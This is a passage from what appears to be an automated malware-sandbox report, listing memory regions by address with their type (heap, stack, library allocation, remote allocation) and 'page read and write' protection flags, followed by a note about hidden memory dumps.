|
page read and write
|
||
|
1E84A296000
|
heap
|
page read and write
|
||
|
183886A8000
|
heap
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
1223F802000
|
trusted library allocation
|
page read and write
|
||
|
1632BFE0000
|
heap
|
page read and write
|
||
|
18388F99000
|
heap
|
page read and write
|
||
|
E7C9AFA000
|
stack
|
page read and write
|
||
|
178A2B50000
|
remote allocation
|
page read and write
|
||
|
1E93E93F000
|
heap
|
page read and write
|
||
|
55164FC000
|
stack
|
page read and write
|
||
|
18388F95000
|
heap
|
page read and write
|
||
|
1D3DFB02000
|
heap
|
page read and write
|
||
|
84AD0FE000
|
stack
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
2AA2C1E0000
|
trusted library allocation
|
page read and write
|
||
|
5EC187C000
|
stack
|
page read and write
|
||
|
183886C0000
|
heap
|
page read and write
|
||
|
3EC5AFE000
|
stack
|
page read and write
|
||
|
1E84A22F000
|
heap
|
page read and write
|
||
|
2AA27358000
|
heap
|
page read and write
|
||
|
2AA273DB000
|
heap
|
page read and write
|
||
|
1E93CB39000
|
heap
|
page read and write
|
||
|
2EA8F010000
|
heap
|
page read and write
|
||
|
2EA8ED90000
|
heap
|
page read and write
|
||
|
2AA2BDDB000
|
trusted library allocation
|
page read and write
|
||
|
1632C302000
|
heap
|
page read and write
|
||
|
18388FAD000
|
heap
|
page read and write
|
||
|
1838864E000
|
heap
|
page read and write
|
||
|
18388FAC000
|
heap
|
page read and write
|
||
|
18ADC700000
|
heap
|
page read and write
|
||
|
2AA2BF1C000
|
heap
|
page read and write
|
||
|
2EA8F015000
|
heap
|
page read and write
|
||
|
1D3DF32C000
|
heap
|
page read and write
|
||
|
80AB56E000
|
stack
|
page read and write
|
||
|
1E93CB13000
|
heap
|
page read and write
|
||
|
1E84A27E000
|
heap
|
page read and write
|
||
|
18388F15000
|
heap
|
page read and write
|
||
|
F269E8C000
|
stack
|
page read and write
|
||
|
1ACCD882000
|
heap
|
page read and write
|
||
|
2A90AC3C000
|
heap
|
page read and write
|
||
|
18388F8F000
|
heap
|
page read and write
|
||
|
2AA2BDD0000
|
trusted library allocation
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
18388F70000
|
heap
|
page read and write
|
||
|
2AA2BF36000
|
heap
|
page read and write
|
||
|
2AA2BF35000
|
heap
|
page read and write
|
||
|
1223F064000
|
heap
|
page read and write
|
||
|
1E93E93F000
|
heap
|
page read and write
|
||
|
1E84AA02000
|
trusted library allocation
|
page read and write
|
||
|
66DBA7A000
|
stack
|
page read and write
|
||
|
18388F91000
|
heap
|
page read and write
|
||
|
936727F000
|
stack
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
1632C23E000
|
heap
|
page read and write
|
||
|
1E84A24B000
|
heap
|
page read and write
|
||
|
17FFFE000
|
stack
|
page read and write
|
||
|
1D3DEA36000
|
heap
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
18388CC0000
|
remote allocation
|
page read and write
|
||
|
1E0F1C40000
|
heap
|
page read and write
|
||
|
84ACE79000
|
stack
|
page read and write
|
||
|
1E93CAF7000
|
heap
|
page read and write
|
||
|
26445400000
|
heap
|
page read and write
|
||
|
2AA2BDDA000
|
trusted library allocation
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
2AA2BEA7000
|
heap
|
page read and write
|
||
|
264452B0000
|
heap
|
page read and write
|
||
|
1D3DEA4F000
|
heap
|
page read and write
|
||
|
2AA26A9F000
|
heap
|
page read and write
|
||
|
18388440000
|
heap
|
page read and write
|
||
|
1E84A22A000
|
heap
|
page read and write
|
||
|
1E0F1C79000
|
heap
|
page read and write
|
||
|
2AA27313000
|
heap
|
page read and write
|
||
|
2AA2BDD1000
|
trusted library allocation
|
page read and write
|
||
|
2AA2BDD0000
|
trusted library allocation
|
page read and write
|
||
|
18388CC0000
|
remote allocation
|
page read and write
|
||
|
2AA2BDD5000
|
trusted library allocation
|
page read and write
|
||
|
178A26AF000
|
heap
|
page read and write
|
||
|
18ADC64A000
|
heap
|
page read and write
|
||
|
2EA8EE17000
|
heap
|
page read and write
|
||
|
1320AE3D000
|
heap
|
page read and write
|
||
|
1E93C9D0000
|
heap
|
page read and write
|
||
|
18ADCD50000
|
trusted library allocation
|
page read and write
|
||
|
1C53DFE000
|
stack
|
page read and write
|
||
|
1E84A237000
|
heap
|
page read and write
|
||
|
18388FAC000
|
heap
|
page read and write
|
||
|
936737C000
|
stack
|
page read and write
|
||
|
1632C2C8000
|
heap
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
2AA2C320000
|
trusted library allocation
|
page read and write
|
||
|
2AA269F3000
|
trusted library allocation
|
page read and write
|
||
|
18ADC63C000
|
heap
|
page read and write
|
||
|
2AA2BDD1000
|
trusted library allocation
|
page read and write
|
||
|
178A264E000
|
heap
|
page read and write
|
||
|
F26A37F000
|
stack
|
page read and write
|
||
|
1D3DEAAB000
|
heap
|
page read and write
|
||
|
178A2623000
|
heap
|
page read and write
|
||
|
1E93CAFF000
|
heap
|
page read and write
|
||
|
2AA2BDD5000
|
trusted library allocation
|
page read and write
|
||
|
17F4CB000
|
stack
|
page read and write
|
||
|
1D3DEA8B000
|
heap
|
page read and write
|
||
|
28B7FB20000
|
heap
|
page read and write
|
||
|
1ACCD860000
|
heap
|
page read and write
|
||
|
AC6BD8F000
|
stack
|
page read and write
|
||
|
1E0F1C29000
|
heap
|
page read and write
|
||
|
2AA26A3D000
|
heap
|
page read and write
|
||
|
2AA2C100000
|
trusted library allocation
|
page read and write
|
||
|
2A90AC6F000
|
heap
|
page read and write
|
||
|
1E84A26A000
|
heap
|
page read and write
|
||
|
2AA2BF75000
|
heap
|
page read and write
|
||
|
1D3DFA1D000
|
heap
|
page read and write
|
||
|
2AA27300000
|
heap
|
page read and write
|
||
|
2AA2C220000
|
remote allocation
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
1D3DEA79000
|
heap
|
page read and write
|
||
|
1ACCD866000
|
heap
|
page read and write
|
||
|
2AA2BF2C000
|
heap
|
page read and write
|
||
|
2AA26B13000
|
heap
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
1D3DEA66000
|
heap
|
page read and write
|
||
|
1E93EA30000
|
heap
|
page read and write
|
||
|
1C542FD000
|
stack
|
page read and write
|
||
|
1D3DEA3D000
|
heap
|
page read and write
|
||
|
80AB8F9000
|
stack
|
page read and write
|
||
|
55166FF000
|
stack
|
page read and write
|
||
|
18388F93000
|
heap
|
page read and write
|
||
|
1ACCD867000
|
heap
|
page read and write
|
||
|
5EC1BFF000
|
stack
|
page read and write
|
||
|
2AA26A79000
|
heap
|
page read and write
|
||
|
5EC1CFE000
|
stack
|
page read and write
|
||
|
18388648000
|
heap
|
page read and write
|
||
|
1ACCD760000
|
heap
|
page read and write
|
||
|
2AA2C220000
|
remote allocation
|
page read and write
|
||
|
1D3DF300000
|
heap
|
page read and write
|
||
|
2AA2BF46000
|
heap
|
page read and write
|
||
|
18388F7C000
|
heap
|
page read and write
|
||
|
2AA2BF37000
|
heap
|
page read and write
|
||
|
26445427000
|
heap
|
page read and write
|
||
|
2AA27800000
|
trusted library section
|
page readonly
|
||
|
183886A9000
|
heap
|
page read and write
|
||
|
1D3DEAB8000
|
heap
|
page read and write
|
||
|
264452A0000
|
heap
|
page read and write
|
||
|
178A2623000
|
heap
|
page read and write
|
||
|
55161FF000
|
stack
|
page read and write
|
||
|
28B00BE0000
|
trusted library allocation
|
page read and write
|
||
|
18388FBF000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
1320B602000
|
trusted library allocation
|
page read and write
|
||
|
84AD27F000
|
stack
|
page read and write
|
||
|
1E93CAF4000
|
heap
|
page read and write
|
||
|
1223F079000
|
heap
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
18388F60000
|
heap
|
page read and write
|
||
|
1320AE02000
|
heap
|
page read and write
|
||
|
2AA2C330000
|
trusted library allocation
|
page read and write
|
||
|
1D3DEADD000
|
heap
|
page read and write
|
||
|
18388F50000
|
heap
|
page read and write
|
||
|
2AA27700000
|
trusted library allocation
|
page read and write
|
||
|
6D3E3FF000
|
stack
|
page read and write
|
||
|
5EC1AF7000
|
stack
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
1D3DEA29000
|
heap
|
page read and write
|
||
|
1D3DF35B000
|
heap
|
page read and write
|
||
|
1632C229000
|
heap
|
page read and write
|
||
|
2AA2BE4C000
|
heap
|
page read and write
|
||
|
18388F67000
|
heap
|
page read and write
|
||
|
1320AC20000
|
heap
|
page read and write
|
||
|
55165FE000
|
stack
|
page read and write
|
||
|
18ADC651000
|
heap
|
page read and write
|
||
|
18ADC670000
|
heap
|
page read and write
|
||
|
DA988FB000
|
stack
|
page read and write
|
||
|
18389402000
|
heap
|
page read and write
|
||
|
140D67E000
|
stack
|
page read and write
|
||
|
1E84A190000
|
trusted library allocation
|
page read and write
|
||
|
178A2692000
|
heap
|
page read and write
|
||
|
F26A3FF000
|
stack
|
page read and write
|
||
|
1E84A277000
|
heap
|
page read and write
|
||
|
E7CA2FA000
|
stack
|
page read and write
|
||
|
28B00BF0000
|
trusted library allocation
|
page read and write
|
||
|
1ACCD882000
|
heap
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
3EC61F9000
|
stack
|
page read and write
|
||
|
2A90AD02000
|
heap
|
page read and write
|
||
|
18388651000
|
heap
|
page read and write
|
||
|
18388600000
|
heap
|
page read and write
|
||
|
2AA2BDD0000
|
trusted library allocation
|
page read and write
|
||
|
1E84A239000
|
heap
|
page read and write
|
||
|
1E84A242000
|
heap
|
page read and write
|
||
|
EED67EB000
|
stack
|
page read and write
|
||
|
1ACCD851000
|
heap
|
page read and write
|
||
|
1E84A237000
|
heap
|
page read and write
|
||
|
18ADC580000
|
heap
|
page read and write
|
||
|
84AD07F000
|
stack
|
page read and write
|
||
|
26445413000
|
heap
|
page read and write
|
||
|
2AA2BDC0000
|
trusted library allocation
|
page read and write
|
||
|
18388F91000
|
heap
|
page read and write
|
||
|
1E84A23F000
|
heap
|
page read and write
|
||
|
18388702000
|
heap
|
page read and write
|
||
|
2AA2C220000
|
remote allocation
|
page read and write
|
||
|
178A25F1000
|
heap
|
page read and write
|
||
|
178A25EC000
|
heap
|
page read and write
|
||
|
3EC5E79000
|
stack
|
page read and write
|
||
|
2AA27400000
|
trusted library allocation
|
page read and write
|
||
|
1E0F1D02000
|
heap
|
page read and write
|
||
|
3EC5F77000
|
stack
|
page read and write
|
||
|
18388629000
|
heap
|
page read and write
|
||
|
2AA2BE62000
|
heap
|
page read and write
|
||
|
2AA271C0000
|
trusted library allocation
|
page read and write
|
||
|
1632CA02000
|
heap
|
page read and write
|
||
|
1E93C920000
|
heap
|
page read and write
|
||
|
EED6D7B000
|
stack
|
page read and write
|
||
|
2AA2C200000
|
trusted library allocation
|
page read and write
|
||
|
1838864D000
|
heap
|
page read and write
|
||
|
1E93C9CE000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
1E0F1D00000
|
heap
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
1D3DE820000
|
heap
|
page read and write
|
||
|
2AA2C104000
|
trusted library allocation
|
page read and write
|
||
|
1D3DEA2E000
|
heap
|
page read and write
|
||
|
18388FAC000
|
heap
|
page read and write
|
||
|
1838943E000
|
heap
|
page read and write
|
||
|
2AA27359000
|
heap
|
page read and write
|
||
|
1D3DFA54000
|
heap
|
page read and write
|
||
|
3EC57AB000
|
stack
|
page read and write
|
||
|
5EC177E000
|
stack
|
page read and write
|
||
|
178A25F3000
|
heap
|
page read and write
|
||
|
EED6F7F000
|
stack
|
page read and write
|
||
|
18388F75000
|
heap
|
page read and write
|
||
|
1E84A23D000
|
heap
|
page read and write
|
||
|
1223F113000
|
heap
|
page read and write
|
||
|
183886B3000
|
heap
|
page read and write
|
||
|
183886FA000
|
heap
|
page read and write
|
||
|
551637C000
|
stack
|
page read and write
|
||
|
17F9FE000
|
stack
|
page read and write
|
||
|
2A90AB40000
|
heap
|
page read and write
|
||
|
1D3DEA72000
|
heap
|
page read and write
|
||
|
18388FBD000
|
heap
|
page read and write
|
||
|
1E93E4C0000
|
heap
|
page read and write
|
||
|
1838868A000
|
heap
|
page read and write
|
||
|
6D3E0FE000
|
stack
|
page read and write
|
||
|
2AA2BF02000
|
heap
|
page read and write
|
||
|
1223EDF0000
|
heap
|
page read and write
|
||
|
1E93CAF8000
|
heap
|
page read and write
|
||
|
2AA2BF2C000
|
heap
|
page read and write
|
||
|
1D3DEA13000
|
heap
|
page read and write
|
||
|
2AA26A00000
|
heap
|
page read and write
|
||
|
1E84A160000
|
heap
|
page read and write
|
||
|
1223F05B000
|
heap
|
page read and write
|
||
|
2AA2C121000
|
trusted library allocation
|
page read and write
|
||
|
2AA26860000
|
heap
|
page read and write
|
||
|
1E84A272000
|
heap
|
page read and write
|
||
|
1E84A24E000
|
heap
|
page read and write
|
||
|
93671FE000
|
stack
|
page read and write
|
||
|
1D3DF313000
|
heap
|
page read and write
|
||
|
2AA27850000
|
trusted library section
|
page readonly
|
||
|
18388430000
|
heap
|
page read and write
|
||
|
178A264E000
|
heap
|
page read and write
|
||
|
2AA2BED3000
|
heap
|
page read and write
|
||
|
178A2692000
|
heap
|
page read and write
|
||
|
26445508000
|
heap
|
page read and write
|
||
|
1E0F1C02000
|
heap
|
page read and write
|
||
|
1632C050000
|
heap
|
page read and write
|
||
|
1ACCD884000
|
heap
|
page read and write
|
||
|
17FDFF000
|
stack
|
page read and write
|
||
|
28B00910000
|
trusted library allocation
|
page read and write
|
||
|
DA989FB000
|
stack
|
page read and write
|
||
|
18388F95000
|
heap
|
page read and write
|
||
|
2AA26A57000
|
heap
|
page read and write
|
||
|
551627C000
|
stack
|
page read and write
|
||
|
178A2425000
|
heap
|
page read and write
|
||
|
2AA2BE10000
|
heap
|
page read and write
|
||
|
18388F7A000
|
heap
|
page read and write
|
||
|
66DBE7B000
|
stack
|
page read and write
|
||
|
2AA26A8B000
|
heap
|
page read and write
|
||
|
2AA2BD60000
|
trusted library allocation
|
page read and write
|
||
|
1E0F1B70000
|
heap
|
page read and write
|
||
|
1E93CB26000
|
heap
|
page read and write
|
||
|
26445460000
|
heap
|
page read and write
|
||
|
18388FBC000
|
heap
|
page read and write
|
||
|
1ACCD885000
|
heap
|
page read and write
|
||
|
2A90AC00000
|
heap
|
page read and write
|
||
|
1D3DEA45000
|
heap
|
page read and write
|
||
|
2EA8EDB0000
|
heap
|
page read and write
|
||
|
178A25C8000
|
heap
|
page read and write
|
||
|
178A2EC0000
|
heap
|
page read and write
|
||
|
1E84A23B000
|
heap
|
page read and write
|
||
|
2AA2BF4E000
|
heap
|
page read and write
|
||
|
3EC5C7E000
|
stack
|
page read and write
|
||
|
2AA2BF79000
|
heap
|
page read and write
|
||
|
1223F013000
|
heap
|
page read and write
|
||
|
18ADC62A000
|
heap
|
page read and write
|
||
|
1632C2E2000
|
heap
|
page read and write
|
||
|
2AA27318000
|
heap
|
page read and write
|
||
|
178A25F3000
|
heap
|
page read and write
|
||
|
1ACCD863000
|
heap
|
page read and write
|
||
|
1E93E921000
|
heap
|
page read and write
|
||
|
1320AC90000
|
heap
|
page read and write
|
||
|
E7C9EFB000
|
stack
|
page read and write
|
||
|
18388650000
|
heap
|
page read and write
|
||
|
2AA27309000
|
heap
|
page read and write
|
||
|
1D3DFB1B000
|
heap
|
page read and write
|
||
|
18388F86000
|
heap
|
page read and write
|
||
|
1D3DEA57000
|
heap
|
page read and write
|
||
|
80AB4EA000
|
stack
|
page read and write
|
||
|
AC6C37E000
|
stack
|
page read and write
|
||
|
18ADC677000
|
heap
|
page read and write
|
||
|
66DB8FF000
|
stack
|
page read and write
|
||
|
2AA2BF75000
|
heap
|
page read and write
|
||
|
2AA2BDB0000
|
trusted library allocation
|
page read and write
|
||
|
2AA269F0000
|
trusted library allocation
|
page read and write
|
||
|
2AA2BF26000
|
heap
|
page read and write
|
||
|
DA98BFE000
|
stack
|
page read and write
|
||
|
1E93CA59000
|
heap
|
page read and write
|
||
|
2AA2BF70000
|
heap
|
page read and write
|
||
|
1ACCD856000
|
heap
|
page read and write
|
||
|
1320AE26000
|
heap
|
page read and write
|
||
|
80AB5EE000
|
stack
|
page read and write
|
||
|
E7CA1FF000
|
stack
|
page read and write
|
||
|
178A2690000
|
heap
|
page read and write
|
||
|
17FCFD000
|
stack
|
page read and write
|
||
|
18388F8D000
|
heap
|
page read and write
|
||
|
28B7FC11000
|
heap
|
page read and write
|
||
|
E7C95CB000
|
stack
|
page read and write
|
||
|
2AA2BEC8000
|
heap
|
page read and write
|
||
|
18388F9B000
|
heap
|
page read and write
|
||
|
26445C02000
|
trusted library allocation
|
page read and write
|
||
|
2AA2BDDC000
|
trusted library allocation
|
page read and write
|
||
|
2AA26A70000
|
heap
|
page read and write
|
||
|
1632C2CA000
|
heap
|
page read and write
|
||
|
140DAFF000
|
stack
|
page read and write
|
||
|
2AA26B02000
|
heap
|
page read and write
|
||
|
178A2626000
|
heap
|
page read and write
|
||
|
1D3DEAC9000
|
heap
|
page read and write
|
||
|
2AA26A94000
|
heap
|
page read and write
|
||
|
18388FAC000
|
heap
|
page read and write
|
||
|
178A2692000
|
heap
|
page read and write
|
||
|
2AA2BF70000
|
heap
|
page read and write
|
||
|
2AA26A13000
|
heap
|
page read and write
|
||
|
1632C313000
|
heap
|
page read and write
|
||
|
1223F06B000
|
heap
|
page read and write
|
||
|
1223F102000
|
heap
|
page read and write
|
||
|
18388F8F000
|
heap
|
page read and write
|
||
|
1E93CAF7000
|
heap
|
page read and write
|
||
|
E7C99F7000
|
stack
|
page read and write
|
||
|
18388F50000
|
heap
|
page read and write
|
||
|
2EA8EE1E000
|
heap
|
page read and write
|
||
|
1D3DEA4C000
|
heap
|
page read and write
|
||
|
18388655000
|
heap
|
page read and write
|
||
|
18388F84000
|
heap
|
page read and write
|
||
|
18388CC0000
|
remote allocation
|
page read and write
|
||
|
1E93E4C4000
|
heap
|
page read and write
|
||
|
1632C200000
|
heap
|
page read and write
|
||
|
18388F6B000
|
heap
|
page read and write
|
||
|
1C541FE000
|
stack
|
page read and write
|
||
|
2AA27200000
|
heap
|
page read and write
|
||
|
1D3DF3EE000
|
heap
|
page read and write
|
||
|
1ACCD856000
|
heap
|
page read and write
|
||
|
178A2B50000
|
remote allocation
|
page read and write
|
||
|
1632BFF0000
|
heap
|
page read and write
|
||
|
26445464000
|
heap
|
page read and write
|
||
|
E7C987E000
|
stack
|
page read and write
|
||
|
2AA27940000
|
trusted library allocation
|
page read and write
|
||
|
55160FE000
|
stack
|
page read and write
|
||
|
1C53EFC000
|
stack
|
page read and write
|
||
|
2AA26970000
|
trusted library section
|
page read and write
|
||
|
2AA2BE2C000
|
heap
|
page read and write
|
||
|
E7CA07E000
|
stack
|
page read and write
|
||
|
178A2410000
|
heap
|
page read and write
|
||
|
18388FBA000
|
heap
|
page read and write
|
||
|
1E93CB25000
|
heap
|
page read and write
|
||
|
2AA27358000
|
heap
|
page read and write
|
||
|
5EC19FB000
|
stack
|
page read and write
|
||
|
6D3E07A000
|
stack
|
page read and write
|
||
|
178A2550000
|
heap
|
page read and write
|
There are 821 hidden memdumps, click here to show them.